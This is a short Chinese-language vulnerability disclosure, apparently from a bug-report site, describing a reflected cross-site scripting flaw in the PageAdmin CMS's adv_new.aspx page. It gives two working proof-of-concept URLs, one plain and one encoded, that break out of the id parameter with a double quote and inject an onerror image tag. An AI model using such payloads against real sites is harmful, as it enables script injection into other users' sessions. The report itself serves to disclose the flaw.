### 简要描述:
http://demo.pageadmin.net/
PageAdmin最新版反射xss
### 详细说明:
构造ID参数,双引号闭合前面。
即可植入html代码。
`http://demo.pageadmin.net/e/aspx/adv_new.aspx?id=1"<img/src=1 onerror=alert(/XSS/)>`
http://demo.pageadmin.net/e/aspx/adv_new.aspx?id=1%22%3C/div%3E%3Cimg/src=1%20onerror=alert%28/XSS/%29%3E
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201406/28131759360b4498e5a2766d431377f831e2bff7.jpg" alt="TM截图20140628131726.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/28131759360b4498e5a2766d431377f831e2bff7.jpg)
全部评论 (4)